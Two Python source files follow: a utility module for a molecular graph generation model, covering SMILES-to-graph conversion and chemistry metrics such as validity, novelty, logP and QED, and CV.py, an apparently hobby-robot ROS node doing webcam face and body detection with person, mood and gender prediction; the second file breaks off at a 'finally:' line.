from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from rdkit import Chem
from rdkit.Chem import rdmolops
from rdkit.Chem import rdFMCS
from collections import defaultdict, deque
import os
import heapq
import planarity
from rdkit.Chem import Crippen
from rdkit.Chem import QED
SMALL_NUMBER = 1e-7
LARGE_NUMBER= 1e10
geometry_numbers=[3, 4, 5, 6] # triangle, square, pentagen, hexagon
# bond mapping
bond_dict = {'SINGLE': 0, 'DOUBLE': 1, 'TRIPLE': 2, "AROMATIC": 3}
number_to_bond= {0: Chem.rdchem.BondType.SINGLE, 1:Chem.rdchem.BondType.DOUBLE,
2: Chem.rdchem.BondType.TRIPLE, 3:Chem.rdchem.BondType.AROMATIC}
def dataset_info(dataset): #qm9, zinc, cep
if dataset=='qm9':
return { 'atom_types': ["H", "C", "N", "O", "F"],
'maximum_valence': {0: 1, 1: 4, 2: 3, 3: 2, 4: 1},
'number_to_atom': {0: "H", 1: "C", 2: "N", 3: "O", 4: "F"},
'bucket_sizes': np.array(list(range(4, 28, 2)) + [29])
}
elif dataset=='zinc':
return { 'atom_types': ['Br1(0)', 'C4(0)', 'Cl1(0)', 'F1(0)', 'H1(0)', 'I1(0)',
'N2(-1)', 'N3(0)', 'N4(1)', 'O1(-1)', 'O2(0)', 'S2(0)','S4(0)', 'S6(0)'],
'maximum_valence': {0: 1, 1: 4, 2: 1, 3: 1, 4: 1, 5:1, 6:2, 7:3, 8:4, 9:1, 10:2, 11:2, 12:4, 13:6, 14:3},
'number_to_atom': {0: 'Br', 1: 'C', 2: 'Cl', 3: 'F', 4: 'H', 5:'I', 6:'N', 7:'N', 8:'N', 9:'O', 10:'O', 11:'S', 12:'S', 13:'S'},
'bucket_sizes': np.array([28,31,33,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,55,58,84])
}
elif dataset=="cep":
return { 'atom_types': ["C", "S", "N", "O", "Se", "Si"],
'maximum_valence': {0: 4, 1: 2, 2: 3, 3: 2, 4: 2, 5: 4},
'number_to_atom': {0: "C", 1: "S", 2: "N", 3: "O", 4: "Se", 5: "Si"},
'bucket_sizes': np.array([25,28,29,30, 32, 33,34,35,36,37,38,39,43,46])
}
else:
print("the datasets in use are qm9|zinc|cep")
exit(1)
# add one edge to adj matrix
def add_edge_mat(amat, src, dest, e, considering_edge_type=True):
if considering_edge_type:
amat[e, dest, src] = 1
amat[e, src, dest] = 1
else:
amat[src, dest] = 1
amat[dest, src] = 1
def graph_to_adj_mat(graph, max_n_vertices, num_edge_types, tie_fwd_bkwd=True, considering_edge_type=True):
if considering_edge_type:
amat = np.zeros((num_edge_types, max_n_vertices, max_n_vertices))
for src, e, dest in graph:
add_edge_mat(amat, src, dest, e)
else:
amat = np.zeros((max_n_vertices, max_n_vertices))
for src, e, dest in graph:
add_edge_mat(amat, src, dest, e, considering_edge_type=False)
return amat
def check_edge_prob(dataset):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
for ep, epl in zip(edge_prob, edge_prob_label):
print("prediction")
print(ep)
print("label")
print(epl)
# check whether a graph is planar or not
def is_planar(location, adj_list, is_dense=False):
if is_dense:
new_adj_list=defaultdict(list)
for x in range(len(adj_list)):
for y in range(len(adj_list)):
if adj_list[x][y]==1:
new_adj_list[x].append((y,1))
adj_list=new_adj_list
edges=[]
seen=set()
for src, l in adj_list.items():
for dst, e in l:
if (dst, src) not in seen:
edges.append((src,dst))
seen.add((src,dst))
edges+=[location, (location[1], location[0])]
return planarity.is_planar(edges)
def check_edge_type_prob(filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
for ep, epl in zip(edge_type_prob, edge_type_label):
print("prediction")
print(ep)
print("label")
print(epl)
def check_mean(dataset, filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(mean.tolist()[:40])
def check_variance(dataset, filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(np.exp(logvariance).tolist()[:40])
def check_node_prob(filter=None):
print(dataset)
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(node_symbol_prob[0])
print(node_symbol[0])
print(node_symbol_prob.shape)
def check_qed(filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(qed_prediction)
print(qed_labels[0])
print(np.mean(np.abs(qed_prediction-qed_labels[0])))
def onehot(idx, len):
z = [0 for _ in range(len)]
z[idx] = 1
return z
def generate_empty_adj_matrix(maximum_vertice_num):
return np.zeros((1, 3, maximum_vertice_num, maximum_vertice_num))
# standard normal with shape [a1, a2, a3]
def generate_std_normal(a1, a2, a3):
return np.random.normal(0, 1, [a1, a2, a3])
def check_validity(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
count=0
for smiles in all_smiles:
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
count+=1
return len(all_smiles), count
# Get length for each graph based on node masks
def get_graph_length(all_node_mask):
all_lengths=[]
for graph in all_node_mask:
if 0 in graph:
length=np.argmin(graph)
else:
length=len(graph)
all_lengths.append(length)
return all_lengths
def make_dir(path):
if not os.path.exists(path):
os.mkdir(path)
print('made directory %s' % path)
# sample node symbols based on node predictions
def sample_node_symbol(all_node_symbol_prob, all_lengths, dataset):
all_node_symbol=[]
for graph_idx, graph_prob in enumerate(all_node_symbol_prob):
node_symbol=[]
for node_idx in range(all_lengths[graph_idx]):
symbol=np.random.choice(np.arange(len(dataset_info(dataset)['atom_types'])), p=graph_prob[node_idx])
node_symbol.append(symbol)
all_node_symbol.append(node_symbol)
return all_node_symbol
def dump(file_name, content):
with open(file_name, 'wb') as out_file:
pickle.dump(content, out_file, pickle.HIGHEST_PROTOCOL)
def load(file_name):
with open(file_name, 'rb') as f:
return pickle.load(f)
# generate a new feature on whether adding the edges will generate more than two overlapped edges for rings
def get_overlapped_edge_feature(edge_mask, color, new_mol):
overlapped_edge_feature=[]
for node_in_focus, neighbor in edge_mask:
if color[neighbor] == 1:
# attempt to add the edge
new_mol.AddBond(int(node_in_focus), int(neighbor), number_to_bond[0])
# Check whether there are two cycles having more than two overlap edges
try:
ssr = Chem.GetSymmSSSR(new_mol)
except:
ssr = []
overlap_flag = False
for idx1 in range(len(ssr)):
for idx2 in range(idx1+1, len(ssr)):
if len(set(ssr[idx1]) & set(ssr[idx2])) > 2:
overlap_flag=True
# remove that edge
new_mol.RemoveBond(int(node_in_focus), int(neighbor))
if overlap_flag:
overlapped_edge_feature.append((node_in_focus, neighbor))
return overlapped_edge_feature
# adj_list [3, v, v] or defaultdict. bfs distance on a graph
def bfs_distance(start, adj_list, is_dense=False):
distances={}
visited=set()
queue=deque([(start, 0)])
visited.add(start)
while len(queue) != 0:
current, d=queue.popleft()
for neighbor, edge_type in adj_list[current]:
if neighbor not in visited:
distances[neighbor]=d+1
visited.add(neighbor)
queue.append((neighbor, d+1))
return [(start, node, d) for node, d in distances.items()]
def get_initial_valence(node_symbol, dataset):
return [dataset_info(dataset)['maximum_valence'][s] for s in node_symbol]
def add_atoms(new_mol, node_symbol, dataset):
for number in node_symbol:
if dataset=='qm9' or dataset=='cep':
idx=new_mol.AddAtom(Chem.Atom(dataset_info(dataset)['number_to_atom'][number]))
elif dataset=='zinc':
new_atom = Chem.Atom(dataset_info(dataset)['number_to_atom'][number])
charge_num=int(dataset_info(dataset)['atom_types'][number].split('(')[1].strip(')'))
new_atom.SetFormalCharge(charge_num)
new_mol.AddAtom(new_atom)
def visualize_mol(path, new_mol):
AllChem.Compute2DCoords(new_mol)
print(path)
Draw.MolToFile(new_mol,path)
def get_idx_of_largest_frag(frags):
return np.argmax([len(frag) for frag in frags])
def remove_extra_nodes(new_mol):
frags=Chem.rdmolops.GetMolFrags(new_mol)
while len(frags) > 1:
# Get the idx of the frag with largest length
largest_idx = get_idx_of_largest_frag(frags)
for idx in range(len(frags)):
if idx != largest_idx:
# Remove one atom that is not in the largest frag
new_mol.RemoveAtom(frags[idx][0])
break
frags=Chem.rdmolops.GetMolFrags(new_mol)
def novelty_metric(dataset):
with open('all_smiles_%s.pkl' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
with open('generated_smiles_%s' % dataset, 'rb') as f:
generated_all_smiles=set(pickle.load(f))
total_new_molecules=0
for generated_smiles in generated_all_smiles:
if generated_smiles not in all_smiles:
total_new_molecules+=1
return float(total_new_molecules)/len(generated_all_smiles)
def count_edge_type(dataset, generated=True):
if generated:
filename='generated_smiles_%s' % dataset
else:
filename='all_smiles_%s.pkl' % dataset
with open(filename, 'rb') as f:
all_smiles=set(pickle.load(f))
counter=defaultdict(int)
edge_type_per_molecule=[]
for smiles in all_smiles:
nodes, edges=to_graph(smiles, dataset)
edge_type_this_molecule=[0]* len(bond_dict)
for edge in edges:
edge_type=edge[1]
edge_type_this_molecule[edge_type]+=1
counter[edge_type]+=1
edge_type_per_molecule.append(edge_type_this_molecule)
total_sum=0
return len(all_smiles), counter, edge_type_per_molecule
def need_kekulize(mol):
for bond in mol.GetBonds():
if bond_dict[str(bond.GetBondType())] >= 3:
return True
return False
def check_planar(dataset):
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
total_non_planar=0
for smiles in all_smiles:
try:
nodes, edges=to_graph(smiles, dataset)
except:
continue
edges=[(src, dst) for src, e, dst in edges]
if edges==[]:
continue
if not planarity.is_planar(edges):
total_non_planar+=1
return len(all_smiles), total_non_planar
def count_atoms(dataset):
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
counter=defaultdict(int)
atom_count_per_molecule=[] # record the counts for each molecule
for smiles in all_smiles:
try:
nodes, edges=to_graph(smiles, dataset)
except:
continue
atom_count_this_molecule=[0]*len(dataset_info(dataset)['atom_types'])
for node in nodes:
atom_type=np.argmax(node)
atom_count_this_molecule[atom_type]+=1
counter[atom_type]+=1
atom_count_per_molecule.append(atom_count_this_molecule)
total_sum=0
return len(all_smiles), counter, atom_count_per_molecule
def align_smiles_by_MCS(smiles_1, smiles_2):
mols = [Chem.MolFromSmiles(smiles_1), Chem.MolFromSmiles(smiles_2)]
res=rdFMCS.FindMCS(mols)
aligned_mols = []
for mol in mols:
sub_idx = list(mol.GetSubstructMatch(Chem.MolFromSmarts(res.smartsString)))
nodes_to_keep = [i for i in range(len(sub_idx))]
mol_range = list(range(mol.GetNumHeavyAtoms()))
idx_to_add = list(set(mol_range).difference(set(sub_idx)))
sub_idx.extend(idx_to_add)
aligned_mols.append(Chem.rdmolops.RenumberAtoms(mol, sub_idx))
return (aligned_mols[0], aligned_mols[1]), res, nodes_to_keep
def to_graph(smiles, dataset):
mol = Chem.MolFromSmiles(smiles)
if mol is None:
return [], []
# Kekulize it
if need_kekulize(mol):
rdmolops.Kekulize(mol)
if mol is None:
return None, None
# remove stereo information, such as inward and outward edges
Chem.RemoveStereochemistry(mol)
edges = []
nodes = []
for bond in mol.GetBonds():
edges.append((bond.GetBeginAtomIdx(), bond_dict[str(bond.GetBondType())], bond.GetEndAtomIdx()))
assert bond_dict[str(bond.GetBondType())] != 3
for atom in mol.GetAtoms():
if dataset=='qm9' or dataset=="cep":
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom.GetSymbol()), len(dataset_info(dataset)['atom_types'])))
elif dataset=='zinc': # transform using "<atom_symbol><valence>(<charge>)" notation
symbol = atom.GetSymbol()
valence = atom.GetTotalValence()
charge = atom.GetFormalCharge()
atom_str = "%s%i(%i)" % (symbol, valence, charge)
if atom_str not in dataset_info(dataset)['atom_types']:
print('unrecognized atom type %s' % atom_str)
return [], []
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom_str), len(dataset_info(dataset)['atom_types'])))
return nodes, edges
def to_graph_mol(mol, dataset):
if mol is None:
return [], []
# Kekulize it
if need_kekulize(mol):
rdmolops.Kekulize(mol)
if mol is None:
return None, None
# remove stereo information, such as inward and outward edges
Chem.RemoveStereochemistry(mol)
edges = []
nodes = []
for bond in mol.GetBonds():
if mol.GetAtomWithIdx(bond.GetBeginAtomIdx()).GetAtomicNum() == 0 or mol.GetAtomWithIdx(bond.GetEndAtomIdx()).GetAtomicNum() == 0:
continue
else:
edges.append((bond.GetBeginAtomIdx(), bond_dict[str(bond.GetBondType())], bond.GetEndAtomIdx()))
assert bond_dict[str(bond.GetBondType())] != 3
for atom in mol.GetAtoms():
if dataset=='qm9' or dataset=="cep":
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom.GetSymbol()), len(dataset_info(dataset)['atom_types'])))
elif dataset=='zinc': # transform using "<atom_symbol><valence>(<charge>)" notation
symbol = atom.GetSymbol()
valence = atom.GetTotalValence()
charge = atom.GetFormalCharge()
atom_str = "%s%i(%i)" % (symbol, valence, charge)
if atom_str not in dataset_info(dataset)['atom_types']:
if "*" in atom_str:
continue
else:
print('unrecognized atom type %s' % atom_str)
return [], []
nodes.append(onehot(dataset_info(dataset)['atom_types'].index(atom_str), len(dataset_info(dataset)['atom_types'])))
return nodes, edges
def check_uniqueness(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=pickle.load(f)
original_num = len(all_smiles)
all_smiles=set(all_smiles)
new_num = len(all_smiles)
return new_num/original_num
def shape_count(dataset, remove_print=False, all_smiles=None):
if all_smiles==None:
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
geometry_counts=[0]*len(geometry_numbers)
geometry_counts_per_molecule=[] # record the geometry counts for each molecule
for smiles in all_smiles:
nodes, edges = to_graph(smiles, dataset)
if len(edges)<=0:
continue
new_mol=Chem.MolFromSmiles(smiles)
ssr = Chem.GetSymmSSSR(new_mol)
counts_for_molecule=[0] * len(geometry_numbers)
for idx in range(len(ssr)):
ring_len=len(list(ssr[idx]))
if ring_len in geometry_numbers:
geometry_counts[geometry_numbers.index(ring_len)]+=1
counts_for_molecule[geometry_numbers.index(ring_len)]+=1
geometry_counts_per_molecule.append(counts_for_molecule)
return len(all_smiles), geometry_counts, geometry_counts_per_molecule
def check_adjacent_sparse(adj_list, node, neighbor_in_doubt):
for neighbor, edge_type in adj_list[node]:
if neighbor == neighbor_in_doubt:
return True, edge_type
return False, None
def glorot_init(shape):
initialization_range = np.sqrt(6.0 / (shape[-2] + shape[-1]))
return np.random.uniform(low=-initialization_range, high=initialization_range, size=shape).astype(np.float32)
class ThreadedIterator:
"""An iterator object that computes its elements in a parallel thread to be ready to be consumed.
The iterator should *not* return None"""
def __init__(self, original_iterator, max_queue_size: int=2):
self.__queue = queue.Queue(maxsize=max_queue_size)
self.__thread = threading.Thread(target=lambda: self.worker(original_iterator))
self.__thread.start()
def worker(self, original_iterator):
for element in original_iterator:
assert element is not None, 'By convention, iterator elements much not be None'
self.__queue.put(element, block=True)
self.__queue.put(None, block=True)
def __iter__(self):
next_element = self.__queue.get(block=True)
while next_element is not None:
yield next_element
next_element = self.__queue.get(block=True)
self.__thread.join()
# Implements multilayer perceptron
class MLP(object):
def __init__(self, in_size, out_size, hid_sizes, dropout_keep_prob):
self.in_size = in_size
self.out_size = out_size
self.hid_sizes = hid_sizes
self.dropout_keep_prob = dropout_keep_prob
self.params = self.make_network_params()
def make_network_params(self):
dims = [self.in_size] + self.hid_sizes + [self.out_size]
weight_sizes = list(zip(dims[:-1], dims[1:]))
weights = [tf.Variable(self.init_weights(s), name='MLP_W_layer%i' % i)
for (i, s) in enumerate(weight_sizes)]
biases = [tf.Variable(np.zeros(s[-1]).astype(np.float32), name='MLP_b_layer%i' % i)
for (i, s) in enumerate(weight_sizes)]
network_params = {
"weights": weights,
"biases": biases,
}
return network_params
def init_weights(self, shape):
return np.sqrt(6.0 / (shape[-2] + shape[-1])) * (2 * np.random.rand(*shape).astype(np.float32) - 1)
def __call__(self, inputs):
acts = inputs
for W, b in zip(self.params["weights"], self.params["biases"]):
hid = tf.matmul(acts, tf.nn.dropout(W, self.dropout_keep_prob)) + b
acts = tf.nn.relu(hid)
last_hidden = hid
return last_hidden
class Graph():
def __init__(self, V, g):
self.V = V
self.graph = g
def addEdge(self, v, w):
# Add w to v ist.
self.graph[v].append(w)
# Add v to w list.
self.graph[w].append(v)
# A recursive function that uses visited[]
# and parent to detect cycle in subgraph
# reachable from vertex v.
def isCyclicUtil(self, v, visited, parent):
# Mark current node as visited
visited[v] = True
# Recur for all the vertices adjacent
# for this vertex
for i in self.graph[v]:
# If an adjacent is not visited,
# then recur for that adjacent
if visited[i] == False:
if self.isCyclicUtil(i, visited, v) == True:
return True
# If an adjacent is visited and not
# parent of current vertex, then there
# is a cycle.
elif i != parent:
return True
return False
# Returns true if the graph is a tree,
# else false.
def isTree(self):
# Mark all the vertices as not visited
# and not part of recursion stack
visited = [False] * self.V
# The call to isCyclicUtil serves multiple
# purposes. It returns true if graph reachable
# from vertex 0 is cyclcic. It also marks
# all vertices reachable from 0.
if self.isCyclicUtil(0, visited, -1) == True:
return False
# If we find a vertex which is not reachable
# from 0 (not marked by isCyclicUtil(),
# then we return false
for i in range(self.V):
if visited[i] == False:
return False
return True
# whether whether the graphs has no cycle or not
def check_cyclic(dataset, generated=True):
if generated:
with open("generated_smiles_%s" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
else:
with open("all_smiles_%s.pkl" % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
tree_count=0
for smiles in all_smiles:
nodes, edges=to_graph(smiles, dataset)
edges=[(src, dst) for src, e, dst in edges]
if edges==[]:
continue
new_adj_list=defaultdict(list)
for src, dst in edges:
new_adj_list[src].append(dst)
new_adj_list[dst].append(src)
graph=Graph(len(nodes), new_adj_list)
if graph.isTree():
tree_count+=1
return len(all_smiles), tree_count
def check_logp(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
logp_sum=0
total=0
logp_score_per_molecule=[]
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
try:
val = Crippen.MolLogP(new_mol)
except:
continue
logp_sum+=val
logp_score_per_molecule.append(val)
total+=1
return logp_sum/total, logp_score_per_molecule
def check_qed(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
qed_sum=0
total=0
qed_score_per_molecule=[]
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
try:
val = QED.qed(new_mol)
except:
continue
qed_sum+=val
qed_score_per_molecule.append(val)
total+=1
return qed_sum/total, qed_score_per_molecule
def sssr_metric(dataset):
with open('generated_smiles_%s' % dataset, 'rb') as f:
all_smiles=set(pickle.load(f))
overlapped_molecule=0
for smiles in all_smiles:
new_mol=Chem.MolFromSmiles(smiles)
ssr = Chem.GetSymmSSSR(new_mol)
overlap_flag=False
for idx1 in range(len(ssr)):
for idx2 in range(idx1+1, len(ssr)):
if len(set(ssr[idx1]) & set(ssr[idx2])) > 2:
overlap_flag=True
if overlap_flag:
overlapped_molecule+=1
return overlapped_molecule/len(all_smiles)
# select the best based on shapes and probs
def select_best(all_mol):
# sort by shape
all_mol=sorted(all_mol)
best_shape=all_mol[-1][0]
all_mol=[(p, m) for s, p, m in all_mol if s==best_shape]
# sort by probs
all_mol=sorted(all_mol)
return all_mol[-1][1]
# a series util function converting sparse matrix representation to dense
def incre_adj_mat_to_dense(incre_adj_mat, num_edge_types, maximum_vertice_num):
new_incre_adj_mat=[]
for sparse_incre_adj_mat in incre_adj_mat:
dense_incre_adj_mat=np.zeros((num_edge_types, maximum_vertice_num,maximum_vertice_num))
for current, adj_list in sparse_incre_adj_mat.items():
for neighbor, edge_type in adj_list:
dense_incre_adj_mat[edge_type][current][neighbor]=1
new_incre_adj_mat.append(dense_incre_adj_mat)
return new_incre_adj_mat # [number_iteration,num_edge_types,maximum_vertice_num, maximum_vertice_num]
def distance_to_others_dense(distance_to_others, maximum_vertice_num):
new_all_distance=[]
for sparse_distances in distance_to_others:
dense_distances=np.zeros((maximum_vertice_num), dtype=int)
for x, y, d in sparse_distances:
dense_distances[y]=d
new_all_distance.append(dense_distances)
return new_all_distance # [number_iteration, maximum_vertice_num]
def overlapped_edge_features_to_dense(overlapped_edge_features, maximum_vertice_num):
new_overlapped_edge_features=[]
for sparse_overlapped_edge_features in overlapped_edge_features:
dense_overlapped_edge_features=np.zeros((maximum_vertice_num), dtype=int)
for node_in_focus, neighbor in sparse_overlapped_edge_features:
dense_overlapped_edge_features[neighbor]=1
new_overlapped_edge_features.append(dense_overlapped_edge_features)
return new_overlapped_edge_features # [number_iteration, maximum_vertice_num]
def node_sequence_to_dense(node_sequence,maximum_vertice_num):
new_node_sequence=[]
for node in node_sequence:
s=[0]*maximum_vertice_num
s[node]=1
new_node_sequence.append(s)
return new_node_sequence # [number_iteration, maximum_vertice_num]
def node_keep_to_dense(nodes_to_keep, maximum_vertice_num):
s=[0]*maximum_vertice_num
for node in nodes_to_keep:
s[node]=1
return s
def edge_type_masks_to_dense(edge_type_masks, maximum_vertice_num, num_edge_types):
new_edge_type_masks=[]
for mask_sparse in edge_type_masks:
mask_dense=np.zeros([num_edge_types, maximum_vertice_num])
for node_in_focus, neighbor, bond in mask_sparse:
mask_dense[bond][neighbor]=1
new_edge_type_masks.append(mask_dense)
return new_edge_type_masks #[number_iteration, 3, maximum_vertice_num]
def edge_type_labels_to_dense(edge_type_labels, maximum_vertice_num,num_edge_types):
new_edge_type_labels=[]
for labels_sparse in edge_type_labels:
labels_dense=np.zeros([num_edge_types, maximum_vertice_num])
for node_in_focus, neighbor, bond in labels_sparse:
labels_dense[bond][neighbor]= 1/float(len(labels_sparse)) # fix the probability bug here.
new_edge_type_labels.append(labels_dense)
return new_edge_type_labels #[number_iteration, 3, maximum_vertice_num]
def edge_masks_to_dense(edge_masks, maximum_vertice_num):
new_edge_masks=[]
for mask_sparse in edge_masks:
mask_dense=[0] * maximum_vertice_num
for node_in_focus, neighbor in mask_sparse:
mask_dense[neighbor]=1
new_edge_masks.append(mask_dense)
return new_edge_masks # [number_iteration, maximum_vertice_num]
def edge_labels_to_dense(edge_labels, maximum_vertice_num):
new_edge_labels=[]
for label_sparse in edge_labels:
label_dense=[0] * maximum_vertice_num
for node_in_focus, neighbor in label_sparse:
label_dense[neighbor]=1/float(len(label_sparse))
new_edge_labels.append(label_dense)
return new_edge_labels # [number_iteration, maximum_vertice_num]
|
CV.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from os.path import dirname, abspath
sys.path.append(dirname(dirname(dirname(dirname(abspath(__file__))))))
reload(sys)
sys.setdefaultencoding('utf-8')
from threading import Thread
import cv2
import time
import rospy
from std_msgs.msg import String
from EmeraldAI.Entities.PredictionObject import PredictionObject
from EmeraldAI.Logic.ComputerVision.ComputerVision import ComputerVision
from EmeraldAI.Config.Config import Config
from EmeraldAI.Logic.ComputerVision.ModelMonitor import ModelMonitor
from EmeraldAI.Logic.Modules import Pid
class WebcamVideoStream:
def __init__(self, camID):
self.stream = cv2.VideoCapture(camID)
self.stream.set(3, Config().GetInt("ComputerVision", "CameraWidth"))
self.stream.set(4, Config().GetInt("ComputerVision", "CameraHeight"))
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
returnValue = self.frame
self.frame = None
return returnValue
def stop(self):
self.stopped = True
def EnsureModelUpdate():
predictionModules = Config().GetList("ComputerVision", "Modules")
ModelMonitor().EnsureModelUpdate(predictionModules)
def RunCV(camID, camType, surveillanceMode, videoStream):
pub = rospy.Publisher('/emerald_ai/io/computer_vision', String, queue_size=10)
rospy.init_node('CV_node', anonymous=True)
rospy.Rate(10) # 10hz
if(camType == "STD"):
camType = Config().Get("ComputerVision", "CameraType")
if(not surveillanceMode):
surveillanceMode = Config().GetBoolean("ComputerVision", "SurveillanceMode")
cvInstanceType = "CV"
if(surveillanceMode):
cvInstanceType = "CVSURV"
if videoStream is not None:
stream = videoStream.start()
else:
camera = cv2.VideoCapture(camID)
camera.set(3, Config().GetInt("ComputerVision", "CameraWidth"))
camera.set(4, Config().GetInt("ComputerVision", "CameraHeight"))
alwaysRecordFace = Config().GetBoolean("ComputerVision", "AlwaysRecordFace")
cropBodyImage = Config().GetBoolean("ComputerVision", "CropBodyImage")
intervalBetweenImages = Config().GetInt("ComputerVision", "IntervalBetweenImages")
bodyDetectionInterval = Config().GetInt("ComputerVision", "BodyDetectionInterval")
predictionThreshold = Config().GetInt("ComputerVision.Prediction", "PredictionThreshold")
showCameraImage = Config().GetBoolean("ComputerVision", "ShowCameraImage")
unknownUserTag = Config().Get("ComputerVision", "UnknownUserTag")
detectionSettings = Config().Get("ComputerVision", "DetectionSettings")
print "Detection Settings: " + detectionSettings
cv = ComputerVision()
predictionObjectList = []
predictionModules = Config().GetList("ComputerVision", "Modules")
for moduleName in predictionModules:
model, dictionary = cv.LoadModel(moduleName)
if (model is None or dictionary is None):
continue
print "load", moduleName
predictionObjectList.append(PredictionObject(moduleName, model, dictionary))
clockFace = time.time()
if videoStream is not None:
image = stream.read()
while image is None:
print "Waiting for stream"
time.sleep(1)
image = stream.read()
else:
while not camera.isOpened():
print "Waiting for camera"
time.sleep(1)
_, image = camera.read()
imageHeight, imageWidth = image.shape[:2]
bodyDetectionTimestamp = time.time()
skipImageCounter = 0
while True:
#rate.sleep()
if videoStream is not None:
image = stream.read()
else:
_, image = camera.read()
if(image is None):
skipImageCounter += 1
if(skipImageCounter > 250):
print "Skip image"
skipImageCounter = 0
continue
if (showCameraImage):
cv2.imshow("image", image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
lumaThreshold = Config().GetInt("ComputerVision", "DarknessThreshold") #
lumaValue = cv.GetLuma(image)
if (lumaValue < lumaThreshold):
lumaData = "{0}|DARKNESS|{1}|{2}".format(cvInstanceType, camType, lumaValue)
#print lumaData
pub.publish(lumaData)
time.sleep(1)
continue
# Body Detection
if((surveillanceMode or bodyDetectionInterval < 999) and bodyDetectionTimestamp <= (time.time()-bodyDetectionInterval)):
rawBodyData = cv.DetectBody(image)
if (len(rawBodyData) > 0):
bodyDetectionTimestamp = time.time()
cv.TakeImage(image, "Body", (rawBodyData if cropBodyImage else None))
# Face Detection
predictionResult, timeoutReached, luckyShot, rawFaceData = cv.PredictStream(image, predictionObjectList)
takeImage = False
bestResultName = None
for predictionObject in predictionResult:
thresholdReached = predictionObject.ThresholdReached(predictionThreshold)
if len(predictionObject.PredictionResult) > 0 and (thresholdReached or timeoutReached or luckyShot):
for key, _ in predictionObject.PredictionResult.iteritems():
bestResult = predictionObject.GetBestPredictionResult(key, 0)
if (predictionObject.Name == "Person"):
secondBestResult = predictionObject.GetBestPredictionResult(key, 1)
if(bestResult[0] == unknownUserTag):
takeImage = True
bestResultName = bestResult[0] if (len(secondBestResult) == 0) else secondBestResult[0]
predictionData = "{0}|PERSON|{1}|{2}|{3}|{4}|{5}|{6}|{7}".format(cvInstanceType, camType, key, bestResult, secondBestResult, thresholdReached, timeoutReached, luckyShot)
if (predictionObject.Name == "Mood"):
predictionData = "{0}|MOOD|{1}|{2}|{3}".format(cvInstanceType, camType, key, bestResult)
if (predictionObject.Name == "Gender"):
predictionData = "{0}|GENDER|{1}|{2}|{3}".format(cvInstanceType, camType, key, bestResult)
#print predictionData
pub.publish(predictionData)
# Face position detection
faceID = 0
for (x, y, w, h) in rawFaceData:
centerX = (x + w/2)
centerY = (y + h/2)
if (centerX < imageWidth/3):
posX = "right"
elif (centerX > imageWidth/3*2):
posX = "left"
else:
posX = "center"
if (centerY < imageHeight/5):
posY = "top"
elif (centerY > imageHeight/5*4):
posY = "bottom"
else:
posY = "center"
positionData = "{0}|POSITION|{1}|{2}|{3}|{4}".format(cvInstanceType, camType, faceID, posX, posY)
#print positionData
pub.publish(positionData)
faceID += 1
# Take Images
if((alwaysRecordFace or takeImage) and clockFace <= (time.time()-intervalBetweenImages) and cv.TakeImage(image, "Person", rawFaceData, grayscale=True, prefix=bestResultName)):
clockFace = time.time()
if __name__ == "__main__":
camID = -1
camType = "STD"
surveillanceMode = False
if len(sys.argv) > 1:
for arg in sys.argv:
if (arg.lower().startswith("-cam")):
camID = int(arg.lower().replace("-cam", ""))
if (arg.lower().startswith("-type")):
camType = int(arg.lower().replace("-type", ""))
if (arg.lower().startswith("-surveillance")):
surveillanceMode = True
if(camID < 0):
camID = Config().GetInt("ComputerVision", "CameraID")
tmpCamID = "" if camID == -1 else camID
if(Pid.HasPid("CV{0}".format(tmpCamID))):
print "Process is already runnung. Bye!"
sys.exit()
Pid.Create("CV{0}".format(tmpCamID))
videoStream = None
if Config().GetBoolean("ComputerVision", "UseThreadedVideo"):
videoStream = WebcamVideoStream(camID)
try:
EnsureModelUpdate()
RunCV(camID, camType, surveillanceMode, videoStream)
except KeyboardInterrupt:
print "End"
finally:
